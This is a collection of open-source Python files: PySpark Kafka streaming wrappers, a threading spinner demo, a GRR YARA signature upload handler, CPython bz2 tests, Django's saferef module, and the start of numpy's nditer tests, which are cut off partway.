__init__(self, jdstream, ssc, jrdd_deserializer): DStream.__init__(self, jdstream, ssc, jrdd_deserializer) def foreachRDD(self, func): """ Apply a function to each RDD in this DStream. 
""" if func.__code__.co_argcount == 1: old_func = func func = lambda r, rdd: old_func(rdd) jfunc = TransformFunction(self._sc, func, self._jrdd_deserializer) \ .rdd_wrapper(lambda jrdd, ctx, ser: KafkaRDD(jrdd, ctx, ser)) api = self._ssc._jvm.PythonDStream api.callForeachRDD(self._jdstream, jfunc) def transform(self, func): """ Return a new DStream in which each RDD is generated by applying a function on each RDD of this DStream. `func` can have one argument of `rdd`, or have two arguments of (`time`, `rdd`) """ if func.__code__.co_argcount == 1: oldfunc = func func = lambda t, rdd: oldfunc(rdd) assert func.__code__.co_argcount == 2, "func should take one or two arguments" return KafkaTransformedDStream(self, func) class KafkaTransformedDStream(TransformedDStream): """ Kafka specific wrapper of TransformedDStream to transform on Kafka RDD. .. note:: Deprecated in 2.3.0 """ def __init__(self, prev, func): TransformedDStream.__init__(self, prev, func) @property def _jdstream(self): if self._jdstream_val is not None: return self._jdstream_val jfunc = TransformFunction(self._sc, self.func, self.prev._jrdd_deserializer) \ .rdd_wrapper(lambda jrdd, ctx, ser: KafkaRDD(jrdd, ctx, ser)) dstream = self._sc._jvm.PythonTransformedDStream(self.prev._jdstream.dstream(), jfunc) self._jdstream_val = dstream.asJavaDStream() return self._jdstream_val class KafkaMessageAndMetadata(object): """ Kafka message and metadata information. Including topic, partition, offset and message .. note:: Deprecated in 2.3.0 """ def __init__(self, topic, partition, offset, key, message): """ Python wrapper of Kafka MessageAndMetadata :param topic: topic name of this Kafka message :param partition: partition id of this Kafka message :param offset: Offset of this Kafka message in the specific partition :param key: key payload of this Kafka message, can be null if this Kafka message has no key specified, the return data is undecoded bytearry. 
:param message: actual message payload of this Kafka message, the return data is undecoded bytearray. """ self.topic = topic self.partition = partition self.offset = offset self._rawKey = key self._rawMessage = message self._keyDecoder = utf8_decoder self._valueDecoder = utf8_decoder def __str__(self): return "KafkaMessageAndMetadata(topic: %s, partition: %d, offset: %d, key and message...)" \ % (self.topic, self.partition, self.offset) def __repr__(self): return self.__str__() def __reduce__(self): return (KafkaMessageAndMetadata, (self.topic, self.partition, self.offset, self._rawKey, self._rawMessage)) def _set_key_decoder(self, decoder): self._keyDecoder = decoder def _set_value_decoder(self, decoder): self._valueDecoder = decoder @property def key(self): return self._keyDecoder(self._rawKey) @property def message(self): return self._valueDecoder(self._rawMessage)
apache-2.0
everaldo/example-code
18-asyncio/spinner_thread.py
13
1273
# spinner_thread.py # credits: Adapted from Michele Simionato's # multiprocessing example in the python-list: # https://mail.python.org/pipermail/python-list/2009-February/538048.html # BEGIN SPINNER_THREAD import threading import itertools import time import sys class Signal: # <1> go = True def spin(msg, signal): # <2> write, flush = sys.stdout.write, sys.stdout.flush for char in itertools.cycle('|/-\\'): # <3> status = char + ' ' + msg write(status) flush() write('\x08' * len(status)) # <4> time.sleep(.1) if not signal.go: # <5> break write(' ' * len(status) + '\x08' * len(status)) # <6> def slow_function(): # <7> # pretend waiting a long time for I/O time.sleep(3) # <8> return 42 def supervisor(): # <9> signal = Signal() spinner = threading.Thread(target=spin, args=('thinking!', signal)) print('spinner object:', spinner) # <10> spinner.start() # <11> result = slow_function() # <12> signal.go = False # <13> spinner.join() # <14> return result def main(): result = supervisor() # <15> print('Answer:', result) if __name__ == '__main__': main() # END SPINNER_THREAD
mit
google/grr
grr/server/grr_response_server/gui/api_plugins/yara.py
1
1489
#!/usr/bin/env python """A module with API handlers related to the YARA memory scanning.""" from grr_response_core.lib.rdfvalues import structs as rdf_structs from grr_response_proto.api import yara_pb2 from grr_response_server import data_store from grr_response_server.gui import api_call_context from grr_response_server.gui import api_call_handler_base from grr_response_server.rdfvalues import objects as rdf_objects class ApiUploadYaraSignatureArgs(rdf_structs.RDFProtoStruct): """An RDF wrapper class for arguments of YARA singature uploader.""" protobuf = yara_pb2.ApiUploadYaraSignatureArgs rdf_deps = [] class ApiUploadYaraSignatureResult(rdf_structs.RDFProtoStruct): """An RDF wrapper class for results of YARA signature uploader.""" protobuf = yara_pb2.ApiUploadYaraSignatureResult rdf_deps = [rdf_objects.BlobID] class ApiUploadYaraSignatureHandler(api_call_handler_base.ApiCallHandler): """An API handler for uploading YARA signatures.""" args_type = ApiUploadYaraSignatureArgs result_type = ApiUploadYaraSignatureResult def Handle( self, args: ApiUploadYaraSignatureArgs, context: api_call_context.ApiCallContext, ) -> ApiUploadYaraSignatureResult: blob = args.signature.encode("utf-8") blob_id = data_store.BLOBS.WriteBlobWithUnknownHash(blob) data_store.REL_DB.WriteYaraSignatureReference(blob_id, context.username) result = ApiUploadYaraSignatureResult() result.blob_id = blob_id return result
apache-2.0
sinkuri256/python-for-android
python3-alpha/python3-src/Lib/test/test_bz2.py
50
16089
#!/usr/bin/env python3 from test import support from test.support import TESTFN import unittest from io import BytesIO import os import subprocess import sys try: import threading except ImportError: threading = None # Skip tests if the bz2 module doesn't exist. bz2 = support.import_module('bz2') from bz2 import BZ2File, BZ2Compressor, BZ2Decompressor has_cmdline_bunzip2 = sys.platform not in ("win32", "os2emx") class BaseTest(unittest.TestCase): "Base for other testcases." TEXT = b'root:x:0:0:root:/root:/bin/bash\nbin:x:1:1:bin:/bin:\ndaemon:x:2:2:daemon:/sbin:\nadm:x:3:4:adm:/var/adm:\nlp:x:4:7:lp:/var/spool/lpd:\nsync:x:5:0:sync:/sbin:/bin/sync\nshutdown:x:6:0:shutdown:/sbin:/sbin/shutdown\nhalt:x:7:0:halt:/sbin:/sbin/halt\nmail:x:8:12:mail:/var/spool/mail:\nnews:x:9:13:news:/var/spool/news:\nuucp:x:10:14:uucp:/var/spool/uucp:\noperator:x:11:0:operator:/root:\ngames:x:12:100:games:/usr/games:\ngopher:x:13:30:gopher:/usr/lib/gopher-data:\nftp:x:14:50:FTP User:/var/ftp:/bin/bash\nnobody:x:65534:65534:Nobody:/home:\npostfix:x:100:101:postfix:/var/spool/postfix:\nniemeyer:x:500:500::/home/niemeyer:/bin/bash\npostgres:x:101:102:PostgreSQL Server:/var/lib/pgsql:/bin/bash\nmysql:x:102:103:MySQL server:/var/lib/mysql:/bin/bash\nwww:x:103:104::/var/www:/bin/false\n' DATA = 
b'BZh91AY&SY.\xc8N\x18\x00\x01>_\x80\x00\x10@\x02\xff\xf0\x01\x07n\x00?\xe7\xff\xe00\x01\x99\xaa\x00\xc0\x03F\x86\x8c#&\x83F\x9a\x03\x06\xa6\xd0\xa6\x93M\x0fQ\xa7\xa8\x06\x804hh\x12$\x11\xa4i4\xf14S\xd2<Q\xb5\x0fH\xd3\xd4\xdd\xd5\x87\xbb\xf8\x94\r\x8f\xafI\x12\xe1\xc9\xf8/E\x00pu\x89\x12]\xc9\xbbDL\nQ\x0e\t1\x12\xdf\xa0\xc0\x97\xac2O9\x89\x13\x94\x0e\x1c7\x0ed\x95I\x0c\xaaJ\xa4\x18L\x10\x05#\x9c\xaf\xba\xbc/\x97\x8a#C\xc8\xe1\x8cW\xf9\xe2\xd0\xd6M\xa7\x8bXa<e\x84t\xcbL\xb3\xa7\xd9\xcd\xd1\xcb\x84.\xaf\xb3\xab\xab\xad`n}\xa0lh\tE,\x8eZ\x15\x17VH>\x88\xe5\xcd9gd6\x0b\n\xe9\x9b\xd5\x8a\x99\xf7\x08.K\x8ev\xfb\xf7xw\xbb\xdf\xa1\x92\xf1\xdd|/";\xa2\xba\x9f\xd5\xb1#A\xb6\xf6\xb3o\xc9\xc5y\\\xebO\xe7\x85\x9a\xbc\xb6f8\x952\xd5\xd7"%\x89>V,\xf7\xa6z\xe2\x9f\xa3\xdf\x11\x11"\xd6E)I\xa9\x13^\xca\xf3r\xd0\x03U\x922\xf26\xec\xb6\xed\x8b\xc3U\x13\x9d\xc5\x170\xa4\xfa^\x92\xacDF\x8a\x97\xd6\x19\xfe\xdd\xb8\xbd\x1a\x9a\x19\xa3\x80ankR\x8b\xe5\xd83]\xa9\xc6\x08\x82f\xf6\xb9"6l$\xb8j@\xc0\x8a\xb0l1..\xbak\x83ls\x15\xbc\xf4\xc1\x13\xbe\xf8E\xb8\x9d\r\xa8\x9dk\x84\xd3n\xfa\xacQ\x07\xb1%y\xaav\xb4\x08\xe0z\x1b\x16\xf5\x04\xe9\xcc\xb9\x08z\x1en7.G\xfc]\xc9\x14\xe1B@\xbb!8`' DATA_CRLF = b'BZh91AY&SY\xaez\xbbN\x00\x01H\xdf\x80\x00\x12@\x02\xff\xf0\x01\x07n\x00?\xe7\xff\xe0@\x01\xbc\xc6`\x86*\x8d=M\xa9\x9a\x86\xd0L@\x0fI\xa6!\xa1\x13\xc8\x88jdi\x8d@\x03@\x1a\x1a\x0c\x0c\x83 
\x00\xc4h2\x19\x01\x82D\x84e\t\xe8\x99\x89\x19\x1ah\x00\r\x1a\x11\xaf\x9b\x0fG\xf5(\x1b\x1f?\t\x12\xcf\xb5\xfc\x95E\x00ps\x89\x12^\xa4\xdd\xa2&\x05(\x87\x04\x98\x89u\xe40%\xb6\x19\'\x8c\xc4\x89\xca\x07\x0e\x1b!\x91UIFU%C\x994!DI\xd2\xfa\xf0\xf1N8W\xde\x13A\xf5\x9cr%?\x9f3;I45A\xd1\x8bT\xb1<l\xba\xcb_\xc00xY\x17r\x17\x88\x08\x08@\xa0\ry@\x10\x04$)`\xf2\xce\x89z\xb0s\xec\x9b.iW\x9d\x81\xb5-+t\x9f\x1a\'\x97dB\xf5x\xb5\xbe.[.\xd7\x0e\x81\xe7\x08\x1cN`\x88\x10\xca\x87\xc3!"\x80\x92R\xa1/\xd1\xc0\xe6mf\xac\xbd\x99\xcca\xb3\x8780>\xa4\xc7\x8d\x1a\\"\xad\xa1\xabyBg\x15\xb9l\x88\x88\x91k"\x94\xa4\xd4\x89\xae*\xa6\x0b\x10\x0c\xd6\xd4m\xe86\xec\xb5j\x8a\x86j\';\xca.\x01I\xf2\xaaJ\xe8\x88\x8cU+t3\xfb\x0c\n\xa33\x13r2\r\x16\xe0\xb3(\xbf\x1d\x83r\xe7M\xf0D\x1365\xd8\x88\xd3\xa4\x92\xcb2\x06\x04\\\xc1\xb0\xea//\xbek&\xd8\xe6+t\xe5\xa1\x13\xada\x16\xder5"w]\xa2i\xb7[\x97R \xe2IT\xcd;Z\x04dk4\xad\x8a\t\xd3\x81z\x10\xf1:^`\xab\x1f\xc5\xdc\x91N\x14$+\x9e\xae\xd3\x80' if has_cmdline_bunzip2: def decompress(self, data): pop = subprocess.Popen("bunzip2", shell=True, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.STDOUT) pop.stdin.write(data) pop.stdin.close() ret = pop.stdout.read() pop.stdout.close() if pop.wait() != 0: ret = bz2.decompress(data) return ret else: # bunzip2 isn't available to run on Windows. def decompress(self, data): return bz2.decompress(data) class BZ2FileTest(BaseTest): "Test BZ2File type miscellaneous methods." 
def setUp(self): self.filename = TESTFN def tearDown(self): if os.path.isfile(self.filename): os.unlink(self.filename) def createTempFile(self, crlf=0): with open(self.filename, "wb") as f: if crlf: data = self.DATA_CRLF else: data = self.DATA f.write(data) def testRead(self): # "Test BZ2File.read()" self.createTempFile() with BZ2File(self.filename) as bz2f: self.assertRaises(TypeError, bz2f.read, None) self.assertEqual(bz2f.read(), self.TEXT) def testRead0(self): # Test BBZ2File.read(0)" self.createTempFile() with BZ2File(self.filename) as bz2f: self.assertRaises(TypeError, bz2f.read, None) self.assertEqual(bz2f.read(0), b"") def testReadChunk10(self): # "Test BZ2File.read() in chunks of 10 bytes" self.createTempFile() with BZ2File(self.filename) as bz2f: text = b'' while 1: str = bz2f.read(10) if not str: break text += str self.assertEqual(text, self.TEXT) def testRead100(self): # "Test BZ2File.read(100)" self.createTempFile() with BZ2File(self.filename) as bz2f: self.assertEqual(bz2f.read(100), self.TEXT[:100]) def testReadLine(self): # "Test BZ2File.readline()" self.createTempFile() with BZ2File(self.filename) as bz2f: self.assertRaises(TypeError, bz2f.readline, None) sio = BytesIO(self.TEXT) for line in sio.readlines(): self.assertEqual(bz2f.readline(), line) def testReadLines(self): # "Test BZ2File.readlines()" self.createTempFile() with BZ2File(self.filename) as bz2f: self.assertRaises(TypeError, bz2f.readlines, None) sio = BytesIO(self.TEXT) self.assertEqual(bz2f.readlines(), sio.readlines()) def testIterator(self): # "Test iter(BZ2File)" self.createTempFile() with BZ2File(self.filename) as bz2f: sio = BytesIO(self.TEXT) self.assertEqual(list(iter(bz2f)), sio.readlines()) def testClosedIteratorDeadlock(self): # "Test that iteration on a closed bz2file releases the lock." 
# http://bugs.python.org/issue3309 self.createTempFile() bz2f = BZ2File(self.filename) bz2f.close() self.assertRaises(ValueError, bz2f.__next__) # This call will deadlock of the above .__next__ call failed to # release the lock. self.assertRaises(ValueError, bz2f.readlines) def testWrite(self): # "Test BZ2File.write()" with BZ2File(self.filename, "w") as bz2f: self.assertRaises(TypeError, bz2f.write) bz2f.write(self.TEXT) with open(self.filename, 'rb') as f: self.assertEqual(self.decompress(f.read()), self.TEXT) def testWriteChunks10(self): # "Test BZ2File.write() with chunks of 10 bytes" with BZ2File(self.filename, "w") as bz2f: n = 0 while 1: str = self.TEXT[n*10:(n+1)*10] if not str: break bz2f.write(str) n += 1 with open(self.filename, 'rb') as f: self.assertEqual(self.decompress(f.read()), self.TEXT) def testWriteLines(self): # "Test BZ2File.writelines()" with BZ2File(self.filename, "w") as bz2f: self.assertRaises(TypeError, bz2f.writelines) sio = BytesIO(self.TEXT) bz2f.writelines(sio.readlines()) # patch #1535500 self.assertRaises(ValueError, bz2f.writelines, ["a"]) with open(self.filename, 'rb') as f: self.assertEqual(self.decompress(f.read()), self.TEXT) def testWriteMethodsOnReadOnlyFile(self): with BZ2File(self.filename, "w") as bz2f: bz2f.write(b"abc") with BZ2File(self.filename, "r") as bz2f: self.assertRaises(IOError, bz2f.write, b"a") self.assertRaises(IOError, bz2f.writelines, [b"a"]) def testSeekForward(self): # "Test BZ2File.seek(150, 0)" self.createTempFile() with BZ2File(self.filename) as bz2f: self.assertRaises(TypeError, bz2f.seek) bz2f.seek(150) self.assertEqual(bz2f.read(), self.TEXT[150:]) def testSeekBackwards(self): # "Test BZ2File.seek(-150, 1)" self.createTempFile() with BZ2File(self.filename) as bz2f: bz2f.read(500) bz2f.seek(-150, 1) self.assertEqual(bz2f.read(), self.TEXT[500-150:]) def testSeekBackwardsFromEnd(self): # "Test BZ2File.seek(-150, 2)" self.createTempFile() with BZ2File(self.filename) as bz2f: bz2f.seek(-150, 2) 
self.assertEqual(bz2f.read(), self.TEXT[len(self.TEXT)-150:]) def testSeekPostEnd(self): # "Test BZ2File.seek(150000)" self.createTempFile() with BZ2File(self.filename) as bz2f: bz2f.seek(150000) self.assertEqual(bz2f.tell(), len(self.TEXT)) self.assertEqual(bz2f.read(), b"") def testSeekPostEndTwice(self): # "Test BZ2File.seek(150000) twice" self.createTempFile() with BZ2File(self.filename) as bz2f: bz2f.seek(150000) bz2f.seek(150000) self.assertEqual(bz2f.tell(), len(self.TEXT)) self.assertEqual(bz2f.read(), b"") def testSeekPreStart(self): # "Test BZ2File.seek(-150, 0)" self.createTempFile() with BZ2File(self.filename) as bz2f: bz2f.seek(-150) self.assertEqual(bz2f.tell(), 0) self.assertEqual(bz2f.read(), self.TEXT) def testOpenDel(self): # "Test opening and deleting a file many times" self.createTempFile() for i in range(10000): o = BZ2File(self.filename) del o def testOpenNonexistent(self): # "Test opening a nonexistent file" self.assertRaises(IOError, BZ2File, "/non/existent") def testBug1191043(self): # readlines() for files containing no newline data = b'BZh91AY&SY\xd9b\x89]\x00\x00\x00\x03\x80\x04\x00\x02\x00\x0c\x00 \x00!\x9ah3M\x13<]\xc9\x14\xe1BCe\x8a%t' with open(self.filename, "wb") as f: f.write(data) with BZ2File(self.filename) as bz2f: lines = bz2f.readlines() self.assertEqual(lines, [b'Test']) with BZ2File(self.filename) as bz2f: xlines = list(bz2f.readlines()) self.assertEqual(xlines, [b'Test']) def testContextProtocol(self): # BZ2File supports the context management protocol f = None with BZ2File(self.filename, "wb") as f: f.write(b"xxx") f = BZ2File(self.filename, "rb") f.close() try: with f: pass except ValueError: pass else: self.fail("__enter__ on a closed file didn't raise an exception") try: with BZ2File(self.filename, "wb") as f: 1/0 except ZeroDivisionError: pass else: self.fail("1/0 didn't raise an exception") @unittest.skipUnless(threading, 'Threading required for this test.') def testThreading(self): # Using a BZ2File from several 
threads doesn't deadlock (issue #7205). data = b"1" * 2**20 nthreads = 10 with bz2.BZ2File(self.filename, 'wb') as f: def comp(): for i in range(5): f.write(data) threads = [threading.Thread(target=comp) for i in range(nthreads)] for t in threads: t.start() for t in threads: t.join() def testMixedIterationReads(self): # Issue #8397: mixed iteration and reads should be forbidden. with bz2.BZ2File(self.filename, 'wb') as f: # The internal buffer size is hard-wired to 8192 bytes, we must # write out more than that for the test to stop half through # the buffer. f.write(self.TEXT * 100) with bz2.BZ2File(self.filename, 'rb') as f: next(f) self.assertRaises(ValueError, f.read) self.assertRaises(ValueError, f.readline) self.assertRaises(ValueError, f.readlines) class BZ2CompressorTest(BaseTest): def testCompress(self): # "Test BZ2Compressor.compress()/flush()" bz2c = BZ2Compressor() self.assertRaises(TypeError, bz2c.compress) data = bz2c.compress(self.TEXT) data += bz2c.flush() self.assertEqual(self.decompress(data), self.TEXT) def testCompressChunks10(self): # "Test BZ2Compressor.compress()/flush() with chunks of 10 bytes" bz2c = BZ2Compressor() n = 0 data = b'' while 1: str = self.TEXT[n*10:(n+1)*10] if not str: break data += bz2c.compress(str) n += 1 data += bz2c.flush() self.assertEqual(self.decompress(data), self.TEXT) class BZ2DecompressorTest(BaseTest): def test_Constructor(self): self.assertRaises(TypeError, BZ2Decompressor, 42) def testDecompress(self): # "Test BZ2Decompressor.decompress()" bz2d = BZ2Decompressor() self.assertRaises(TypeError, bz2d.decompress) text = bz2d.decompress(self.DATA) self.assertEqual(text, self.TEXT) def testDecompressChunks10(self): # "Test BZ2Decompressor.decompress() with chunks of 10 bytes" bz2d = BZ2Decompressor() text = b'' n = 0 while 1: str = self.DATA[n*10:(n+1)*10] if not str: break text += bz2d.decompress(str) n += 1 self.assertEqual(text, self.TEXT) def testDecompressUnusedData(self): # "Test BZ2Decompressor.decompress() 
with unused data" bz2d = BZ2Decompressor() unused_data = b"this is unused data" text = bz2d.decompress(self.DATA+unused_data) self.assertEqual(text, self.TEXT) self.assertEqual(bz2d.unused_data, unused_data) def testEOFError(self): # "Calling BZ2Decompressor.decompress() after EOS must raise EOFError" bz2d = BZ2Decompressor() text = bz2d.decompress(self.DATA) self.assertRaises(EOFError, bz2d.decompress, b"anything") class FuncTest(BaseTest): "Test module functions" def testCompress(self): # "Test compress() function" data = bz2.compress(self.TEXT) self.assertEqual(self.decompress(data), self.TEXT) def testDecompress(self): # "Test decompress() function" text = bz2.decompress(self.DATA) self.assertEqual(text, self.TEXT) def testDecompressEmpty(self): # "Test decompress() function with empty string" text = bz2.decompress(b"") self.assertEqual(text, b"") def testDecompressIncomplete(self): # "Test decompress() function with incomplete data" self.assertRaises(ValueError, bz2.decompress, self.DATA[:-10]) def test_main(): support.run_unittest( BZ2FileTest, BZ2CompressorTest, BZ2DecompressorTest, FuncTest ) support.reap_children() if __name__ == '__main__': test_main() # vim:ts=4:sw=4
apache-2.0
lidavidm/mathics-heroku
venv/lib/python2.7/site-packages/django/dispatch/saferef.py
218
10623
""" "Safe weakrefs", originally from pyDispatcher. Provides a way to safely weakref any function, including bound methods (which aren't handled by the core weakref module). """ import traceback import weakref def safeRef(target, onDelete = None): """Return a *safe* weak reference to a callable target target -- the object to be weakly referenced, if it's a bound method reference, will create a BoundMethodWeakref, otherwise creates a simple weakref. onDelete -- if provided, will have a hard reference stored to the callable to be called after the safe reference goes out of scope with the reference object, (either a weakref or a BoundMethodWeakref) as argument. """ if hasattr(target, '__self__'): if target.__self__ is not None: # Turn a bound method into a BoundMethodWeakref instance. # Keep track of these instances for lookup by disconnect(). assert hasattr(target, '__func__'), """safeRef target %r has __self__, but no __func__, don't know how to create reference"""%( target,) reference = get_bound_method_weakref( target=target, onDelete=onDelete ) return reference if callable(onDelete): return weakref.ref(target, onDelete) else: return weakref.ref( target ) class BoundMethodWeakref(object): """'Safe' and reusable weak references to instance methods BoundMethodWeakref objects provide a mechanism for referencing a bound method without requiring that the method object itself (which is normally a transient object) is kept alive. Instead, the BoundMethodWeakref object keeps weak references to both the object and the function which together define the instance method. Attributes: key -- the identity key for the reference, calculated by the class's calculateKey method applied to the target instance method deletionMethods -- sequence of callable objects taking single argument, a reference to this object which will be called when *either* the target object or target function is garbage collected (i.e. when this object becomes invalid). 
These are specified as the onDelete parameters of safeRef calls. weakSelf -- weak reference to the target object weakFunc -- weak reference to the target function Class Attributes: _allInstances -- class attribute pointing to all live BoundMethodWeakref objects indexed by the class's calculateKey(target) method applied to the target objects. This weak value dictionary is used to short-circuit creation so that multiple references to the same (object, function) pair produce the same BoundMethodWeakref instance. """ _allInstances = weakref.WeakValueDictionary() def __new__( cls, target, onDelete=None, *arguments,**named ): """Create new instance or return current instance Basically this method of construction allows us to short-circuit creation of references to already- referenced instance methods. The key corresponding to the target is calculated, and if there is already an existing reference, that is returned, with its deletionMethods attribute updated. Otherwise the new instance is created and registered in the table of already-referenced methods. """ key = cls.calculateKey(target) current =cls._allInstances.get(key) if current is not None: current.deletionMethods.append( onDelete) return current else: base = super( BoundMethodWeakref, cls).__new__( cls ) cls._allInstances[key] = base base.__init__( target, onDelete, *arguments,**named) return base def __init__(self, target, onDelete=None): """Return a weak-reference-like instance for a bound method target -- the instance-method target for the weak reference, must have __self__ and __func__ attributes and be reconstructable via: target.__func__.__get__( target.__self__ ) which is true of built-in instance methods. onDelete -- optional callback which will be called when this weak reference ceases to be valid (i.e. either the object or the function is garbage collected). Should take a single argument, which will be passed a pointer to this object. 
""" def remove(weak, self=self): """Set self.isDead to true when method or instance is destroyed""" methods = self.deletionMethods[:] del self.deletionMethods[:] try: del self.__class__._allInstances[ self.key ] except KeyError: pass for function in methods: try: if callable( function ): function( self ) except Exception as e: try: traceback.print_exc() except AttributeError: print('Exception during saferef %s cleanup function %s: %s' % ( self, function, e) ) self.deletionMethods = [onDelete] self.key = self.calculateKey( target ) self.weakSelf = weakref.ref(target.__self__, remove) self.weakFunc = weakref.ref(target.__func__, remove) self.selfName = str(target.__self__) self.funcName = str(target.__func__.__name__) def calculateKey( cls, target ): """Calculate the reference key for this reference Currently this is a two-tuple of the id()'s of the target object and the target function respectively. """ return (id(target.__self__),id(target.__func__)) calculateKey = classmethod( calculateKey ) def __str__(self): """Give a friendly representation of the object""" return """%s( %s.%s )"""%( self.__class__.__name__, self.selfName, self.funcName, ) __repr__ = __str__ def __hash__(self): return hash(self.key) def __bool__( self ): """Whether we are still a valid reference""" return self() is not None def __nonzero__(self): # Python 2 compatibility return type(self).__bool__(self) def __eq__(self, other): """Compare with another reference""" if not isinstance(other, self.__class__): return self.__class__ == type(other) return self.key == other.key def __call__(self): """Return a strong reference to the bound method If the target cannot be retrieved, then will return None, otherwise returns a bound instance method for our object and function. Note: You may call this method any number of times, as it does not invalidate the reference. 
""" target = self.weakSelf() if target is not None: function = self.weakFunc() if function is not None: return function.__get__(target) return None class BoundNonDescriptorMethodWeakref(BoundMethodWeakref): """A specialized BoundMethodWeakref, for platforms where instance methods are not descriptors. It assumes that the function name and the target attribute name are the same, instead of assuming that the function is a descriptor. This approach is equally fast, but not 100% reliable because functions can be stored on an attribute named differenty than the function's name such as in: class A: pass def foo(self): return "foo" A.bar = foo But this shouldn't be a common use case. So, on platforms where methods aren't descriptors (such as Jython) this implementation has the advantage of working in the most cases. """ def __init__(self, target, onDelete=None): """Return a weak-reference-like instance for a bound method target -- the instance-method target for the weak reference, must have __self__ and __func__ attributes and be reconstructable via: target.__func__.__get__( target.__self__ ) which is true of built-in instance methods. onDelete -- optional callback which will be called when this weak reference ceases to be valid (i.e. either the object or the function is garbage collected). Should take a single argument, which will be passed a pointer to this object. """ assert getattr(target.__self__, target.__name__) == target, \ ("method %s isn't available as the attribute %s of %s" % (target, target.__name__, target.__self__)) super(BoundNonDescriptorMethodWeakref, self).__init__(target, onDelete) def __call__(self): """Return a strong reference to the bound method If the target cannot be retrieved, then will return None, otherwise returns a bound instance method for our object and function. Note: You may call this method any number of times, as it does not invalidate the reference. 
""" target = self.weakSelf() if target is not None: function = self.weakFunc() if function is not None: # Using partial() would be another option, but it erases the # "signature" of the function. That is, after a function is # curried, the inspect module can't be used to determine how # many arguments the function expects, nor what keyword # arguments it supports, and pydispatcher needs this # information. return getattr(target, function.__name__) return None def get_bound_method_weakref(target, onDelete): """Instantiates the appropiate BoundMethodWeakRef, depending on the details of the underlying class method implementation""" if hasattr(target, '__get__'): # target method is a descriptor, so the default implementation works: return BoundMethodWeakref(target=target, onDelete=onDelete) else: # no luck, use the alternative implementation: return BoundNonDescriptorMethodWeakref(target=target, onDelete=onDelete)
gpl-3.0
ChanderG/numpy
numpy/core/tests/test_nditer.py
85
103653
from __future__ import division, absolute_import, print_function import sys import warnings import numpy as np from numpy import array, arange, nditer, all from numpy.compat import asbytes, sixu from numpy.core.multiarray_tests import test_nditer_too_large from numpy.testing import ( run_module_suite, assert_, assert_equal, assert_array_equal, assert_raises, dec ) def iter_multi_index(i): ret = [] while not i.finished: ret.append(i.multi_index) i.iternext() return ret def iter_indices(i): ret = [] while not i.finished: ret.append(i.index) i.iternext() return ret def iter_iterindices(i): ret = [] while not i.finished: ret.append(i.iterindex) i.iternext() return ret def test_iter_refcount(): # Make sure the iterator doesn't leak # Basic a = arange(6) dt = np.dtype('f4').newbyteorder() rc_a = sys.getrefcount(a) rc_dt = sys.getrefcount(dt) it = nditer(a, [], [['readwrite', 'updateifcopy']], casting='unsafe', op_dtypes=[dt]) assert_(not it.iterationneedsapi) assert_(sys.getrefcount(a) > rc_a) assert_(sys.getrefcount(dt) > rc_dt) it = None assert_equal(sys.getrefcount(a), rc_a) assert_equal(sys.getrefcount(dt), rc_dt) # With a copy a = arange(6, dtype='f4') dt = np.dtype('f4') rc_a = sys.getrefcount(a) rc_dt = sys.getrefcount(dt) it = nditer(a, [], [['readwrite']], op_dtypes=[dt]) rc2_a = sys.getrefcount(a) rc2_dt = sys.getrefcount(dt) it2 = it.copy() assert_(sys.getrefcount(a) > rc2_a) assert_(sys.getrefcount(dt) > rc2_dt) it = None assert_equal(sys.getrefcount(a), rc2_a) assert_equal(sys.getrefcount(dt), rc2_dt) it2 = None assert_equal(sys.getrefcount(a), rc_a) assert_equal(sys.getrefcount(dt), rc_dt) del it2 # avoid pyflakes unused variable warning def test_iter_best_order(): # The iterator should always find the iteration order # with increasing memory addresses # Test the ordering for 1-D to 5-D shapes for shape in [(5,), (3, 4), (2, 3, 4), (2, 3, 4, 3), (2, 3, 2, 2, 3)]: a = arange(np.prod(shape)) # Test each combination of positive and negative strides for dirs in 
range(2**len(shape)): dirs_index = [slice(None)]*len(shape) for bit in range(len(shape)): if ((2**bit) & dirs): dirs_index[bit] = slice(None, None, -1) dirs_index = tuple(dirs_index) aview = a.reshape(shape)[dirs_index] # C-order i = nditer(aview, [], [['readonly']]) assert_equal([x for x in i], a) # Fortran-order i = nditer(aview.T, [], [['readonly']]) assert_equal([x for x in i], a) # Other order if len(shape) > 2: i = nditer(aview.swapaxes(0, 1), [], [['readonly']]) assert_equal([x for x in i], a) def test_iter_c_order(): # Test forcing C order # Test the ordering for 1-D to 5-D shapes for shape in [(5,), (3, 4), (2, 3, 4), (2, 3, 4, 3), (2, 3, 2, 2, 3)]: a = arange(np.prod(shape)) # Test each combination of positive and negative strides for dirs in range(2**len(shape)): dirs_index = [slice(None)]*len(shape) for bit in range(len(shape)): if ((2**bit) & dirs): dirs_index[bit] = slice(None, None, -1) dirs_index = tuple(dirs_index) aview = a.reshape(shape)[dirs_index] # C-order i = nditer(aview, order='C') assert_equal([x for x in i], aview.ravel(order='C')) # Fortran-order i = nditer(aview.T, order='C') assert_equal([x for x in i], aview.T.ravel(order='C')) # Other order if len(shape) > 2: i = nditer(aview.swapaxes(0, 1), order='C') assert_equal([x for x in i], aview.swapaxes(0, 1).ravel(order='C')) def test_iter_f_order(): # Test forcing F order # Test the ordering for 1-D to 5-D shapes for shape in [(5,), (3, 4), (2, 3, 4), (2, 3, 4, 3), (2, 3, 2, 2, 3)]: a = arange(np.prod(shape)) # Test each combination of positive and negative strides for dirs in range(2**len(shape)): dirs_index = [slice(None)]*len(shape) for bit in range(len(shape)): if ((2**bit) & dirs): dirs_index[bit] = slice(None, None, -1) dirs_index = tuple(dirs_index) aview = a.reshape(shape)[dirs_index] # C-order i = nditer(aview, order='F') assert_equal([x for x in i], aview.ravel(order='F')) # Fortran-order i = nditer(aview.T, order='F') assert_equal([x for x in i], aview.T.ravel(order='F')) # 
